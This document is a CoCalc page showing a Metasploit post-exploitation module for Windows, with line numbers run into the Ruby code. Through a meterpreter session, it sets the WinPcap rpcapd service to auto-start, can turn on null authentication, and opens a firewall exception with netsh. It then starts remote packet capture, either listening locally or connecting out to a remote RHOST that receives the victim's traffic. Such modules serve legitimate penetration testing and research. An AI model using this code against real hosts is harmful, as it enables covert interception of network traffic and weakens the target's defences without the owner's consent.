CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/windows/manage/rpcapd_start.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Windows::Registry8include Msf::Post::Windows::Services9include Msf::Post::Windows::Priv1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Windows Manage Remote Packet Capture Service Starter',16'Description' => %q{17This module enables the Remote Packet Capture System (rpcapd service)18included in the default installation of Winpcap. The module allows you to set up19the service in passive or active mode (useful if the client is behind a firewall).20If authentication is enabled you need a local user account to capture traffic.21PORT will be used depending of the mode configured.22},23'License' => MSF_LICENSE,24'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],25'Platform' => 'win',26'SessionTypes' => [ 'meterpreter' ]27)28)2930register_options(31[32OptBool.new('NULLAUTH', [ true, 'Enable Null Authentication.', true]),33OptBool.new('ACTIVE', [ true, 'Enable rpcapd in active mode (passive by default).', false]),34OptAddress.new('RHOST', [ false, 'Remote host to connect (set in active mode only).']),35OptInt.new('PORT', [ true, 'Local/Remote port to capture traffic.', 2002])36]37)38end3940def run41if is_admin?42serv = service_info('rpcapd')43print_status("Checking if machine #{sysinfo['Computer']} has rpcapd service")4445if serv[:display] !~ /remote/i46print_error("This machine doesn't seem to have the rpcapd service")47else48print_status("Rpcap service found: #{serv[:display]}")4950start_type = serv[:starttype]51prog = get_env('ProgramFiles') << '\\winpcap\\rpcapd.exe'52if start_type != START_TYPE_AUTO53print_status("Setting rpcapd as 'auto' service")54service_change_startup('rpcapd', START_TYPE_AUTO)55end56if datastore['ACTIVE']57if datastore['RHOST'].nil?58print_error('RHOST is not set ')59return60else61p = prog << " -d -a #{datastore['RHOST']},#{datastore['PORT']} -v "62print_status("Installing rpcap in ACTIVE mode (remote port: #{datastore['PORT']})")63end64else65fw_enable(prog)66print_status("Installing rpcap in PASSIVE mode (local port: #{datastore['PORT']}) ")67p = prog << " -d -p #{datastore['PORT']} "68end69if datastore['NULLAUTH']70p << '-n'71end72run_rpcapd(p)73end74else75print_error("You don't have enough privileges. Try getsystem.")76end77end7879def run_rpcapd(p)80service_name = 'rpcapd'81begin82if service_restart(service_name)83print_good("Rpcapd started successfully: #{p}")84else85print_error('There was an error restarting rpcapd.exe.')86end87rescue ::Exception => e88print_error("The following Error was encountered: #{e.class} #{e}")89end90end9192def fw_enable(prog)93print_status('Enabling rpcapd.exe in Windows Firewall')94begin95if file_exist?(prog)96cmd_exec('netsh', "firewall add allowedprogram \"#{prog}\" \"Windows Service\" ENABLE ", 30)97else98print_error("rpcad.exe doesn't exist in #{prog}. Check the installation of WinPcap")99end100rescue ::Exception => e101print_status("The following Error was encountered: #{e.class} #{e}")102end103end104end105106107